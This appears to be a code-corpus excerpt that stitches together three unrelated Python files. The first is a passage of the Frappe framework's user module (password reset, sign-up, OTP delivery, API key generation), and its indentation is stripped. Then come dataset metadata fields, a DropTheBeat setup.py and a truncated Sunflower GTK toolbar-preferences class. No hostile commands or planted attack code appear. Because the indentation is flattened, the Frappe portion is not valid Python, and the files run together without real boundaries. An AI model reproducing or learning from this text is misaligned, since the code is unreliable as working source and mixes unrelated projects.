subject = frappe.get_attr(method[-1])()
if not subject:
site_name = frappe.db.get_default('site_name') or frappe.get_conf().get("site_name")
if site_name:
subject = _("Welcome to {0}").format(site_name)
else:
subject = _("Complete Registration")
self.send_login_mail(subject, "new_user",
dict(
link=link,
site_url=get_url(),
))
def send_login_mail(self, subject, template, add_args, now=None):
"""send mail with login details"""
from frappe.utils.user import get_user_fullname
from frappe.utils import get_url
created_by = get_user_fullname(frappe.session['user'])
if created_by == "Guest":
created_by = "Administrator"
args = {
'first_name': self.first_name or self.last_name or "user",
'user': self.name,
'title': subject,
'login_url': get_url(),
'created_by': created_by
}
args.update(add_args)
sender = frappe.session.user not in STANDARD_USERS and get_formatted_email(frappe.session.user) or None
frappe.sendmail(recipients=self.email, sender=sender, subject=subject,
template=template, args=args, header=[subject, "green"],
delayed=(not now) if now!=None else self.flags.delay_emails, retry=3)
def a_system_manager_should_exist(self):
if not self.get_other_system_managers():
throw(_("There should remain at least one System Manager"))
def on_trash(self):
frappe.clear_cache(user=self.name)
if self.name in STANDARD_USERS:
throw(_("User {0} cannot be deleted").format(self.name))
self.a_system_manager_should_exist()
# disable the user and log him/her out
self.enabled = 0
if getattr(frappe.local, "login_manager", None):
frappe.local.login_manager.logout(user=self.name)
# delete todos
frappe.db.sql("""DELETE FROM `tabToDo` WHERE `owner`=%s""", (self.name,))
frappe.db.sql("""UPDATE `tabToDo` SET `assigned_by`=NULL WHERE `assigned_by`=%s""",
(self.name,))
# delete events
frappe.db.sql("""delete from `tabEvent` where owner=%s
and event_type='Private'""", (self.name,))
# delete shares
frappe.db.sql("""delete from `tabDocShare` where user=%s""", self.name)
# delete messages
frappe.db.sql("""delete from `tabCommunication`
where communication_type in ('Chat', 'Notification')
and reference_doctype='User'
and (reference_name=%s or owner=%s)""", (self.name, self.name))
# unlink contact
frappe.db.sql("""update `tabContact`
set `user`=null
where `user`=%s""", (self.name))
# delete notification settings
frappe.delete_doc("Notification Settings", self.name, ignore_permissions=True)
if self.get('allow_in_mentions'):
frappe.cache().delete_key('users_for_mentions')
def before_rename(self, old_name, new_name, merge=False):
self.check_demo()
frappe.clear_cache(user=old_name)
self.validate_rename(old_name, new_name)
def validate_rename(self, old_name, new_name):
# do not allow renaming administrator and guest
if old_name in STANDARD_USERS:
throw(_("User {0} cannot be renamed").format(self.name))
self.validate_email_type(new_name)
def validate_email_type(self, email):
from frappe.utils import validate_email_address
validate_email_address(email.strip(), True)
def after_rename(self, old_name, new_name, merge=False):
tables = frappe.db.get_tables()
for tab in tables:
desc = frappe.db.get_table_columns_description(tab)
has_fields = []
for d in desc:
if d.get('name') in ['owner', 'modified_by']:
has_fields.append(d.get('name'))
for field in has_fields:
frappe.db.sql("""UPDATE `%s`
SET `%s` = %s
WHERE `%s` = %s""" %
(tab, field, '%s', field, '%s'), (new_name, old_name))
if frappe.db.exists("Chat Profile", old_name):
frappe.rename_doc("Chat Profile", old_name, new_name, force=True, show_alert=False)
if frappe.db.exists("Notification Settings", old_name):
frappe.rename_doc("Notification Settings", old_name, new_name, force=True, show_alert=False)
# set email
frappe.db.sql("""UPDATE `tabUser`
SET email = %s
WHERE name = %s""", (new_name, new_name))
def append_roles(self, *roles):
"""Add roles to user"""
current_roles = [d.role for d in self.get("roles")]
for role in roles:
if role in current_roles:
continue
self.append("roles", {"role": role})
def add_roles(self, *roles):
"""Add roles to user and save"""
self.append_roles(*roles)
self.save()
def remove_roles(self, *roles):
existing_roles = dict((d.role, d) for d in self.get("roles"))
for role in roles:
if role in existing_roles:
self.get("roles").remove(existing_roles[role])
self.save()
def remove_all_roles_for_guest(self):
if self.name == "Guest":
self.set("roles", list(set(d for d in self.get("roles") if d.role == "Guest")))
def remove_disabled_roles(self):
disabled_roles = [d.name for d in frappe.get_all("Role", filters={"disabled":1})]
for role in list(self.get('roles')):
if role.role in disabled_roles:
self.get('roles').remove(role)
def ensure_unique_roles(self):
exists = []
for i, d in enumerate(self.get("roles")):
if (not d.role) or (d.role in exists):
self.get("roles").remove(d)
else:
exists.append(d.role)
def validate_username(self):
if not self.username and self.is_new() and self.first_name:
self.username = frappe.scrub(self.first_name)
if not self.username:
return
# strip space and @
self.username = self.username.strip(" @")
if self.username_exists():
if self.user_type == 'System User':
frappe.msgprint(_("Username {0} already exists").format(self.username))
self.suggest_username()
self.username = ""
def password_strength_test(self):
""" test password strength """
if self.flags.ignore_password_policy:
return
if self.__new_password:
user_data = (self.first_name, self.middle_name, self.last_name, self.email, self.birth_date)
result = test_password_strength(self.__new_password, '', None, user_data)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
def suggest_username(self):
def _check_suggestion(suggestion):
if self.username != suggestion and not self.username_exists(suggestion):
return suggestion
return None
# @firstname
username = _check_suggestion(frappe.scrub(self.first_name))
if not username:
# @firstname_last_name
username = _check_suggestion(frappe.scrub("{0} {1}".format(self.first_name, self.last_name or "")))
if username:
frappe.msgprint(_("Suggested Username: {0}").format(username))
return username
def username_exists(self, username=None):
return frappe.db.get_value("User", {"username": username or self.username, "name": ("!=", self.name)})
def get_blocked_modules(self):
"""Returns list of modules blocked for that user"""
return [d.module for d in self.block_modules] if self.block_modules else []
def validate_user_email_inbox(self):
""" check if same email account added in User Emails twice """
email_accounts = [ user_email.email_account for user_email in self.user_emails ]
if len(email_accounts) != len(set(email_accounts)):
frappe.throw(_("Email Account added multiple times"))
def get_social_login_userid(self, provider):
try:
for p in self.social_logins:
if p.provider == provider:
return p.userid
except:
return None
def set_social_login_userid(self, provider, userid, username=None):
social_logins = {
"provider": provider,
"userid": userid
}
if username:
social_logins["username"] = username
self.append("social_logins", social_logins)
def get_restricted_ip_list(self):
if not self.restrict_ip:
return
return [i.strip() for i in self.restrict_ip.split(",")]
@classmethod
def find_by_credentials(cls, user_name: str, password: str, validate_password: bool = True):
"""Find the user by credentials.
This is a login utility that needs to check login related system settings while finding the user.
1. Find user by email ID by default
2. If allow_login_using_mobile_number is set, you can use mobile number while finding the user.
3. If allow_login_using_user_name is set, you can use username while finding the user.
"""
login_with_mobile = cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_mobile_number"))
login_with_username = cint(frappe.db.get_value("System Settings", "System Settings", "allow_login_using_user_name"))
or_filters = [{"name": user_name}]
if login_with_mobile:
or_filters.append({"mobile_no": user_name})
if login_with_username:
or_filters.append({"username": user_name})
users = frappe.db.get_all('User', fields=['name', 'enabled'], or_filters=or_filters, limit=1)
if not users:
return
user = users[0]
user['is_authenticated'] = True
if validate_password:
try:
check_password(user['name'], password, delete_tracker_cache=False)
except frappe.AuthenticationError:
user['is_authenticated'] = False
return user
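# Illustrative call (hypothetical account): User.find_by_credentials("[email protected]", "secret")
# returns a dict like {"name": "[email protected]", "enabled": 1, "is_authenticated": True}
# when the password matches, or with is_authenticated set to False on a failed check.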
@frappe.whitelist()
def get_timezones():
import pytz
return {
"timezones": pytz.all_timezones
}
@frappe.whitelist()
def get_all_roles(arg=None):
"""return all roles"""
active_domains = frappe.get_active_domains()
roles = frappe.get_all("Role", filters={
"name": ("not in", "Administrator,Guest,All"),
"disabled": 0
}, or_filters={
"ifnull(restrict_to_domain, '')": "",
"restrict_to_domain": ("in", active_domains)
}, order_by="name")
return [ role.get("name") for role in roles ]
@frappe.whitelist()
def get_roles(arg=None):
"""get roles for a user"""
return frappe.get_roles(frappe.form_dict['uid'])
@frappe.whitelist()
def get_perm_info(role):
"""get permission info"""
from frappe.permissions import get_all_perms
return get_all_perms(role)
@frappe.whitelist(allow_guest=True)
def update_password(new_password, logout_all_sessions=0, key=None, old_password=None):
#validate key to avoid key input like ['like', '%'], '', ['in', ['']]
if key and not isinstance(key, str):
frappe.throw(_('Invalid key type'))
result = test_password_strength(new_password, key, old_password)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
res = _get_user_for_update_password(key, old_password)
if res.get('message'):
frappe.local.response.http_status_code = 410
return res['message']
else:
user = res['user']
logout_all_sessions = cint(logout_all_sessions) or frappe.db.get_single_value("System Settings", "logout_on_password_reset")
_update_password(user, new_password, logout_all_sessions=cint(logout_all_sessions))
user_doc, redirect_url = reset_user_data(user)
# get redirect url from cache
redirect_to = frappe.cache().hget('redirect_after_login', user)
if redirect_to:
redirect_url = redirect_to
frappe.cache().hdel('redirect_after_login', user)
frappe.local.login_manager.login_as(user)
frappe.db.set_value("User", user, "last_password_reset_date", today())
frappe.db.set_value("User", user, "reset_password_key", "")
if user_doc.user_type == "System User":
return "/app"
else:
return redirect_url if redirect_url else "/"
@frappe.whitelist(allow_guest=True)
def test_password_strength(new_password, key=None, old_password=None, user_data=None):
from frappe.utils.password_strength import test_password_strength as _test_password_strength
password_policy = frappe.db.get_value("System Settings", None,
["enable_password_policy", "minimum_password_score"], as_dict=True) or {}
enable_password_policy = cint(password_policy.get("enable_password_policy", 0))
minimum_password_score = cint(password_policy.get("minimum_password_score", 0))
if not enable_password_policy:
return {}
if not user_data:
user_data = frappe.db.get_value('User', frappe.session.user,
['first_name', 'middle_name', 'last_name', 'email', 'birth_date'])
if new_password:
result = _test_password_strength(new_password, user_inputs=user_data)
password_policy_validation_passed = False
# score should be greater than 0 and minimum_password_score
if result.get('score') and result.get('score') >= minimum_password_score:
password_policy_validation_passed = True
result['feedback']['password_policy_validation_passed'] = password_policy_validation_passed
return result
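# test_password_strength returns a zxcvbn-style dict, roughly:
# {"score": 3, "feedback": {"warning": "", "suggestions": [],
#  "password_policy_validation_passed": True}}; treat this shape as a sketch, since the
# exact keys come from frappe.utils.password_strength.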
#for login
@frappe.whitelist()
def has_email_account(email):
return frappe.get_list("Email Account", filters={"email_id": email})
@frappe.whitelist(allow_guest=False)
def get_email_awaiting(user):
waiting = frappe.db.sql("""select email_account,email_id
from `tabUser Email`
where awaiting_password = 1
and parent = %(user)s""", {"user":user}, as_dict=1)
if waiting:
return waiting
else:
frappe.db.sql("""update `tabUser Email`
set awaiting_password =0
where parent = %(user)s""",{"user":user})
return False
@frappe.whitelist(allow_guest=False)
def set_email_password(email_account, user, password):
account = frappe.get_doc("Email Account", email_account)
if account.awaiting_password:
account.awaiting_password = 0
account.password = password
try:
account.save(ignore_permissions=True)
except Exception:
frappe.db.rollback()
return False
return True
def setup_user_email_inbox(email_account, awaiting_password, email_id, enable_outgoing):
""" setup email inbox for user """
def add_user_email(user):
user = frappe.get_doc("User", user)
row = user.append("user_emails", {})
row.email_id = email_id
row.email_account = email_account
row.awaiting_password = awaiting_password or 0
row.enable_outgoing = enable_outgoing or 0
user.save(ignore_permissions=True)
	update_user_email_settings = False
if not all([email_account, email_id]):
return
user_names = frappe.db.get_values("User", { "email": email_id }, as_dict=True)
if not user_names:
return
for user in user_names:
user_name = user.get("name")
		# check if inbox is already configured
user_inbox = frappe.db.get_value("User Email", {
"email_account": email_account,
"parent": user_name
}, ["name"]) or None
if not user_inbox:
add_user_email(user_name)
else:
# update awaiting password for email account
			update_user_email_settings = True
	if update_user_email_settings:
frappe.db.sql("""UPDATE `tabUser Email` SET awaiting_password = %(awaiting_password)s,
enable_outgoing = %(enable_outgoing)s WHERE email_account = %(email_account)s""", {
"email_account": email_account,
"enable_outgoing": enable_outgoing,
"awaiting_password": awaiting_password or 0
})
else:
users = " and ".join([frappe.bold(user.get("name")) for user in user_names])
frappe.msgprint(_("Enabled email inbox for user {0}").format(users))
ask_pass_update()
def remove_user_email_inbox(email_account):
""" remove user email inbox settings if email account is deleted """
if not email_account:
return
users = frappe.get_all("User Email", filters={
"email_account": email_account
}, fields=["parent as name"])
for user in users:
doc = frappe.get_doc("User", user.get("name"))
to_remove = [ row for row in doc.user_emails if row.email_account == email_account ]
[ doc.remove(row) for row in to_remove ]
doc.save(ignore_permissions=True)
def ask_pass_update():
# update the sys defaults as to awaiting users
from frappe.utils import set_default
users = frappe.db.sql("""SELECT DISTINCT(parent) as user FROM `tabUser Email`
WHERE awaiting_password = 1""", as_dict=True)
password_list = [ user.get("user") for user in users ]
set_default("email_user_password", u','.join(password_list))
def _get_user_for_update_password(key, old_password):
# verify old password
if key:
user = frappe.db.get_value("User", {"reset_password_key": key})
if not user:
return {
				'message': _("The link you specified has either already been used or is invalid")
}
elif old_password:
# verify old password
frappe.local.login_manager.check_password(frappe.session.user, old_password)
user = frappe.session.user
else:
return
return {
'user': user
}
def reset_user_data(user):
user_doc = frappe.get_doc("User", user)
redirect_url = user_doc.redirect_url
user_doc.reset_password_key = ''
user_doc.redirect_url = ''
user_doc.save(ignore_permissions=True)
return user_doc, redirect_url
@frappe.whitelist()
def verify_password(password):
frappe.local.login_manager.check_password(frappe.session.user, password)
@frappe.whitelist(allow_guest=True)
def sign_up(email, full_name, redirect_to):
if not is_signup_enabled():
frappe.throw(_('Sign Up is disabled'), title='Not Allowed')
user = frappe.db.get("User", {"email": email})
if user:
if user.disabled:
return 0, _("Registered but disabled")
else:
return 0, _("Already Registered")
else:
if frappe.db.sql("""select count(*) from tabUser where
HOUR(TIMEDIFF(CURRENT_TIMESTAMP, TIMESTAMP(modified)))=1""")[0][0] > 300:
frappe.respond_as_web_page(_('Temporarily Disabled'),
_('Too many users signed up recently, so the registration is disabled. Please try back in an hour'),
http_status_code=429)
from frappe.utils import random_string
user = frappe.get_doc({
"doctype":"User",
"email": email,
"first_name": escape_html(full_name),
"enabled": 1,
"new_password": random_string(10),
"user_type": "Website User"
})
user.flags.ignore_permissions = True
user.flags.ignore_password_policy = True
user.insert()
# set default signup role as per Portal Settings
default_role = frappe.db.get_value("Portal Settings", None, "default_role")
if default_role:
user.add_roles(default_role)
if redirect_to:
frappe.cache().hset('redirect_after_login', user.name, redirect_to)
if user.flags.email_sent:
return 1, _("Please check your email for verification")
else:
return 2, _("Please ask your administrator to verify your sign-up")
@frappe.whitelist(allow_guest=True)
@rate_limit(key='user', limit=get_password_reset_limit, seconds = 24*60*60, methods=['POST'])
def reset_password(user):
if user=="Administrator":
return 'not allowed'
try:
user = frappe.get_doc("User", user)
if not user.enabled:
return 'disabled'
user.validate_reset_password()
user.reset_password(send_email=True)
return frappe.msgprint(_("Password reset instructions have been sent to your email"))
except frappe.DoesNotExistError:
frappe.clear_messages()
return 'not found'
@frappe.whitelist()
@frappe.validate_and_sanitize_search_inputs
def user_query(doctype, txt, searchfield, start, page_len, filters):
from frappe.desk.reportview import get_match_cond, get_filters_cond
conditions=[]
user_type_condition = "and user_type != 'Website User'"
if filters and filters.get('ignore_user_type'):
user_type_condition = ''
filters.pop('ignore_user_type')
txt = "%{}%".format(txt)
return frappe.db.sql("""SELECT `name`, CONCAT_WS(' ', first_name, middle_name, last_name)
FROM `tabUser`
WHERE `enabled`=1
{user_type_condition}
AND `docstatus` < 2
AND `name` NOT IN ({standard_users})
AND ({key} LIKE %(txt)s
OR CONCAT_WS(' ', first_name, middle_name, last_name) LIKE %(txt)s)
{fcond} {mcond}
ORDER BY
CASE WHEN `name` LIKE %(txt)s THEN 0 ELSE 1 END,
CASE WHEN concat_ws(' ', first_name, middle_name, last_name) LIKE %(txt)s
THEN 0 ELSE 1 END,
NAME asc
LIMIT %(page_len)s OFFSET %(start)s
""".format(
user_type_condition = user_type_condition,
standard_users=", ".join([frappe.db.escape(u) for u in STANDARD_USERS]),
key=searchfield,
fcond=get_filters_cond(doctype, filters, conditions),
mcond=get_match_cond(doctype)
),
dict(start=start, page_len=page_len, txt=txt)
)
def get_total_users():
"""Returns total no. of system users"""
return flt(frappe.db.sql('''SELECT SUM(`simultaneous_sessions`)
FROM `tabUser`
WHERE `enabled` = 1
AND `user_type` = 'System User'
AND `name` NOT IN ({})'''.format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS)[0][0])
def get_system_users(exclude_users=None, limit=None):
if not exclude_users:
exclude_users = []
elif not isinstance(exclude_users, (list, tuple)):
exclude_users = [exclude_users]
limit_cond = ''
if limit:
limit_cond = 'limit {0}'.format(limit)
exclude_users += list(STANDARD_USERS)
system_users = frappe.db.sql_list("""select name from `tabUser`
where enabled=1 and user_type != 'Website User'
and name not in ({}) {}""".format(", ".join(["%s"]*len(exclude_users)), limit_cond),
exclude_users)
return system_users
def get_active_users():
	"""Returns the number of system users who logged in during the last 3 days"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type != 'Website User'
and name not in ({})
and hour(timediff(now(), last_active)) < 72""".format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS)[0][0]
def get_website_users():
"""Returns total no. of website users"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type = 'Website User'""")[0][0]
def get_active_website_users():
	"""Returns the number of website users who logged in during the last 3 days"""
return frappe.db.sql("""select count(*) from `tabUser`
where enabled = 1 and user_type = 'Website User'
and hour(timediff(now(), last_active)) < 72""")[0][0]
def get_permission_query_conditions(user):
if user=="Administrator":
return ""
else:
return """(`tabUser`.name not in ({standard_users}))""".format(
standard_users = ", ".join(frappe.db.escape(user) for user in STANDARD_USERS))
def has_permission(doc, user):
if (user != "Administrator") and (doc.name in STANDARD_USERS):
# dont allow non Administrator user to view / edit Administrator user
return False
def notify_admin_access_to_system_manager(login_manager=None):
if (login_manager
and login_manager.user == "Administrator"
and frappe.local.conf.notify_admin_access_to_system_manager):
site = '<a href="{0}" target="_blank">{0}</a>'.format(frappe.local.request.host_url)
date_and_time = '<b>{0}</b>'.format(format_datetime(now_datetime(), format_string="medium"))
ip_address = frappe.local.request_ip
access_message = _('Administrator accessed {0} on {1} via IP Address {2}.').format(
site, date_and_time, ip_address)
frappe.sendmail(
recipients=get_system_managers(),
subject=_("Administrator Logged In"),
template="administrator_logged_in",
args={'access_message': access_message},
header=['Access Notification', 'orange']
)
def extract_mentions(txt):
"""Find all instances of @mentions in the html."""
soup = BeautifulSoup(txt, 'html.parser')
emails = []
for mention in soup.find_all(class_='mention'):
if mention.get('data-is-group') == 'true':
try:
user_group = frappe.get_cached_doc('User Group', mention['data-id'])
emails += [d.user for d in user_group.user_group_members]
except frappe.DoesNotExistError:
pass
continue
email = mention['data-id']
emails.append(email)
return emails
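# Example with the mention markup the text editor is assumed to produce:
# extract_mentions('<span class="mention" data-id="[email protected]"></span>') -> ['[email protected]']
# Group mentions (data-is-group="true") expand to the members of the referenced User Group.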
def handle_password_test_fail(result):
suggestions = result['feedback']['suggestions'][0] if result['feedback']['suggestions'] else ''
warning = result['feedback']['warning'] if 'warning' in result['feedback'] else ''
suggestions += "<br>" + _("Hint: Include symbols, numbers and capital letters in the password") + '<br>'
frappe.throw(' '.join([_('Invalid Password:'), warning, suggestions]))
def update_gravatar(name):
gravatar = has_gravatar(name)
if gravatar:
frappe.db.set_value('User', name, 'user_image', gravatar)
@frappe.whitelist(allow_guest=True)
def send_token_via_sms(tmp_id,phone_no=None,user=None):
try:
from frappe.core.doctype.sms_settings.sms_settings import send_request
except:
return False
if not frappe.cache().ttl(tmp_id + '_token'):
return False
ss = frappe.get_doc('SMS Settings', 'SMS Settings')
if not ss.sms_gateway_url:
return False
token = frappe.cache().get(tmp_id + '_token')
args = {ss.message_parameter: 'verification code is {}'.format(token)}
for d in ss.get("parameters"):
args[d.parameter] = d.value
if user:
user_phone = frappe.db.get_value('User', user, ['phone','mobile_no'], as_dict=1)
usr_phone = user_phone.mobile_no or user_phone.phone
if not usr_phone:
return False
else:
if phone_no:
usr_phone = phone_no
else:
return False
args[ss.receiver_parameter] = usr_phone
status = send_request(ss.sms_gateway_url, args, use_post=ss.use_post)
if 200 <= status < 300:
frappe.cache().delete(tmp_id + '_token')
return True
else:
return False
@frappe.whitelist(allow_guest=True)
def send_token_via_email(tmp_id,token=None):
import pyotp
user = frappe.cache().get(tmp_id + '_user')
count = token or frappe.cache().get(tmp_id + '_token')
if ((not user) or (user == 'None') or (not count)):
return False
user_email = frappe.db.get_value('User',user, 'email')
if not user_email:
return False
otpsecret = frappe.cache().get(tmp_id + '_otp_secret')
hotp = pyotp.HOTP(otpsecret)
frappe.sendmail(
recipients=user_email,
sender=None,
subject="Verification Code",
template="verification_code",
args=dict(code=hotp.at(int(count))),
delayed=False,
retry=3
)
return True
@frappe.whitelist(allow_guest=True)
def reset_otp_secret(user):
otp_issuer = frappe.db.get_value('System Settings', 'System Settings', 'otp_issuer_name')
user_email = frappe.db.get_value('User',user, 'email')
if frappe.session.user in ["Administrator", user] :
frappe.defaults.clear_default(user + '_otplogin')
frappe.defaults.clear_default(user + '_otpsecret')
email_args = {
'recipients':user_email, 'sender':None, 'subject':'OTP Secret Reset - {}'.format(otp_issuer or "Frappe Framework"),
'message':'<p>Your OTP secret on {} has been reset. If you did not perform this reset and did not request it, please contact your System Administrator immediately.</p>'.format(otp_issuer or "Frappe Framework"),
'delayed':False,
'retry':3
}
enqueue(method=frappe.sendmail, queue='short', timeout=300, event=None, is_async=True, job_name=None, now=False, **email_args)
return frappe.msgprint(_("OTP Secret has been reset. Re-registration will be required on next login."))
else:
return frappe.throw(_("OTP secret can only be reset by the Administrator."))
def throttle_user_creation():
if frappe.flags.in_import:
return
if frappe.db.get_creation_count('User', 60) > frappe.local.conf.get("throttle_user_limit", 60):
frappe.throw(_('Throttled'))
@frappe.whitelist()
def get_role_profile(role_profile):
roles = frappe.get_doc('Role Profile', {'role_profile': role_profile})
return roles.roles
@frappe.whitelist()
def get_module_profile(module_profile):
module_profile = frappe.get_doc('Module Profile', {'module_profile_name': module_profile})
return module_profile.get('block_modules')
def update_roles(role_profile):
users = frappe.get_all('User', filters={'role_profile_name': role_profile})
role_profile = frappe.get_doc('Role Profile', role_profile)
roles = [role.role for role in role_profile.roles]
for d in users:
user = frappe.get_doc('User', d)
user.set('roles', [])
user.add_roles(*roles)
def create_contact(user, ignore_links=False, ignore_mandatory=False):
from frappe.contacts.doctype.contact.contact import get_contact_name
if user.name in ["Administrator", "Guest"]: return
contact_name = get_contact_name(user.email)
if not contact_name:
contact = frappe.get_doc({
"doctype": "Contact",
"first_name": user.first_name,
"last_name": user.last_name,
"user": user.name,
"gender": user.gender,
})
if user.email:
contact.add_email(user.email, is_primary=True)
if user.phone:
contact.add_phone(user.phone, is_primary_phone=True)
if user.mobile_no:
contact.add_phone(user.mobile_no, is_primary_mobile_no=True)
contact.insert(ignore_permissions=True, ignore_links=ignore_links, ignore_mandatory=ignore_mandatory)
else:
contact = frappe.get_doc("Contact", contact_name)
contact.first_name = user.first_name
contact.last_name = user.last_name
contact.gender = user.gender
# Add mobile number if phone does not exists in contact
if user.phone and not any(new_contact.phone == user.phone for new_contact in contact.phone_nos):
# Set primary phone if there is no primary phone number
contact.add_phone(
user.phone,
is_primary_phone=not any(
new_contact.is_primary_phone == 1 for new_contact in contact.phone_nos
)
)
# Add mobile number if mobile does not exists in contact
if user.mobile_no and not any(new_contact.phone == user.mobile_no for new_contact in contact.phone_nos):
# Set primary mobile if there is no primary mobile number
contact.add_phone(
user.mobile_no,
is_primary_mobile_no=not any(
new_contact.is_primary_mobile_no == 1 for new_contact in contact.phone_nos
)
)
contact.save(ignore_permissions=True)
@frappe.whitelist()
def generate_keys(user):
"""
generate api key and api secret
:param user: str
"""
if "System Manager" in frappe.get_roles():
user_details = frappe.get_doc("User", user)
api_secret = frappe.generate_hash(length=15)
# if api key is not set generate api key
if not user_details.api_key:
api_key = frappe.generate_hash(length=15)
user_details.api_key = api_key
user_details.api_secret = api_secret
user_details.save()
return {"api_secret": api_secret}
frappe.throw(frappe._("Not Permitted"), frappe.PermissionError)
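# Illustrative use (hypothetical user): generate_keys("[email protected]") stores a fresh
# api_key/api_secret on that User and returns {"api_secret": "..."}; callers without
# the System Manager role hit the PermissionError above.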
@frappe.whitelist()
def switch_theme(theme):
if theme in ["Dark", "Light"]:
frappe.db.set_value("User", frappe.session.user, "desk_theme", theme)
| mit | -1,635,436,983,036,877,300 | 31.306634 | 213 | 0.69565 | false |
jacebrowning/dropthebeat | setup.py | 1 | 2371 | #!/usr/bin/env python
"""Setup script for DropTheBeat."""
import os
import sys
import setuptools
PACKAGE_NAME = 'dtb'
MINIMUM_PYTHON_VERSION = 3, 4
def check_python_version():
"""Exit when the Python version is too low."""
if sys.version_info < MINIMUM_PYTHON_VERSION:
sys.exit("Python {}.{}+ is required.".format(*MINIMUM_PYTHON_VERSION))
def read_package_variable(key):
"""Read the value of a variable from the package without importing."""
module_path = os.path.join(PACKAGE_NAME, '__init__.py')
with open(module_path) as module:
for line in module:
parts = line.strip().split(' ')
if parts and parts[0] == key:
return parts[-1].strip("'")
assert 0, "'{0}' not found in '{1}'".format(key, module_path)
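# For example, read_package_variable('__version__') returns the version string declared
# in dtb/__init__.py (the actual value depends on the package).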
def read_descriptions():
"""Build a description for the project from documentation files."""
try:
readme = open("README.rst").read()
changelog = open("CHANGELOG.rst").read()
except IOError:
return "<placeholder>"
else:
return readme + '\n' + changelog
check_python_version()
setuptools.setup(
name=read_package_variable('__project__'),
version=read_package_variable('__version__'),
description="Music sharing using Dropbox.",
url='https://github.com/jacebrowning/dropthebeat',
author='Jace Browning',
author_email='[email protected]',
packages=setuptools.find_packages(),
entry_points={'console_scripts': ['dtb = dtb.cli:main',
'DropTheBeat = dtb.gui:main']},
long_description=read_descriptions(),
license='MIT',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Environment :: MacOS X',
'Environment :: Win32 (MS Windows)',
'Environment :: X11 Applications',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Communications :: File Sharing',
'Topic :: Multimedia :: Sound/Audio',
],
install_requires=open("requirements.txt").readlines(),
)
| lgpl-3.0 | 5,393,324,607,916,161,000 | 29.397436 | 78 | 0.609869 | false |
MeanEYE/Sunflower | sunflower/gui/preferences/toolbar.py | 1 | 8025 | import json
from gi.repository import Gtk
from sunflower.widgets.settings_page import SettingsPage
class Column:
NAME = 0
DESCRIPTION = 1
TYPE = 2
ICON = 3
CONFIG = 4
class ToolbarOptions(SettingsPage):
"""Toolbar options extension class"""
def __init__(self, parent, application):
SettingsPage.__init__(self, parent, application, 'toolbar', _('Toolbar'))
self._toolbar_manager = self._application.toolbar_manager
# create list box
container = Gtk.ScrolledWindow()
container.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
container.set_shadow_type(Gtk.ShadowType.IN)
self._store = Gtk.ListStore(str, str, str, str, str)
self._list = Gtk.TreeView()
self._list.set_model(self._store)
cell_icon = Gtk.CellRendererPixbuf()
cell_name = Gtk.CellRendererText()
cell_name.set_property('editable', True)
cell_name.set_property('mode', Gtk.CellRendererMode.EDITABLE)
cell_name.connect('edited', self._edited_name, 0)
cell_type = Gtk.CellRendererText()
# create name column
col_name = Gtk.TreeViewColumn(_('Name'))
col_name.set_min_width(200)
col_name.set_resizable(True)
		# pack and configure renderers
col_name.pack_start(cell_icon, False)
col_name.pack_start(cell_name, True)
col_name.add_attribute(cell_icon, 'icon-name', Column.ICON)
col_name.add_attribute(cell_name, 'text', Column.NAME)
# create type column
col_type = Gtk.TreeViewColumn(_('Type'), cell_type, markup=Column.DESCRIPTION)
col_type.set_resizable(True)
col_type.set_expand(True)
# add columns to the list
self._list.append_column(col_name)
self._list.append_column(col_type)
container.add(self._list)
# create controls
button_box = Gtk.HBox(False, 5)
button_add = Gtk.Button(stock=Gtk.STOCK_ADD)
button_add.connect('clicked', self._add_widget)
button_delete = Gtk.Button(stock=Gtk.STOCK_DELETE)
button_delete.connect('clicked', self._delete_widget)
button_edit = Gtk.Button(stock=Gtk.STOCK_EDIT)
button_edit.connect('clicked', self._edit_widget)
image_up = Gtk.Image()
image_up.set_from_stock(Gtk.STOCK_GO_UP, Gtk.IconSize.BUTTON)
button_move_up = Gtk.Button(label=None)
button_move_up.add(image_up)
button_move_up.set_tooltip_text(_('Move Up'))
button_move_up.connect('clicked', self._move_widget, -1)
image_down = Gtk.Image()
image_down.set_from_stock(Gtk.STOCK_GO_DOWN, Gtk.IconSize.BUTTON)
button_move_down = Gtk.Button(label=None)
button_move_down.add(image_down)
button_move_down.set_tooltip_text(_('Move Down'))
button_move_down.connect('clicked', self._move_widget, 1)
# pack ui
button_box.pack_start(button_add, False, False, 0)
button_box.pack_start(button_delete, False, False, 0)
button_box.pack_start(button_edit, False, False, 0)
button_box.pack_end(button_move_down, False, False, 0)
button_box.pack_end(button_move_up, False, False, 0)
# toolbar style
label_style = Gtk.Label(label=_('Toolbar style:'))
list_styles = Gtk.ListStore(str, int)
list_styles.append((_('Icons'), Gtk.ToolbarStyle.ICONS))
list_styles.append((_('Text'), Gtk.ToolbarStyle.TEXT))
list_styles.append((_('Both'), Gtk.ToolbarStyle.BOTH))
list_styles.append((_('Both horizontal'), Gtk.ToolbarStyle.BOTH_HORIZ))
renderer = Gtk.CellRendererText()
self._combobox_styles = Gtk.ComboBox(model=list_styles)
self._combobox_styles.pack_start(renderer, True)
self._combobox_styles.add_attribute(renderer, 'text', 0)
self._combobox_styles.connect('changed', self._parent.enable_save)
# toolbar icon size
label_icon_size = Gtk.Label(label=_('Icon size:'))
list_icon_size = Gtk.ListStore(str, int)
list_icon_size.append((_('Small toolbar icon'), Gtk.IconSize.SMALL_TOOLBAR))
list_icon_size.append((_('Large toolbar icon'), Gtk.IconSize.LARGE_TOOLBAR))
list_icon_size.append((_('Same as drag icons'), Gtk.IconSize.DND))
list_icon_size.append((_('Same as dialog'), Gtk.IconSize.DIALOG))
renderer = Gtk.CellRendererText()
self._combobox_icon_size = Gtk.ComboBox(model=list_icon_size)
self._combobox_icon_size.pack_start(renderer, True)
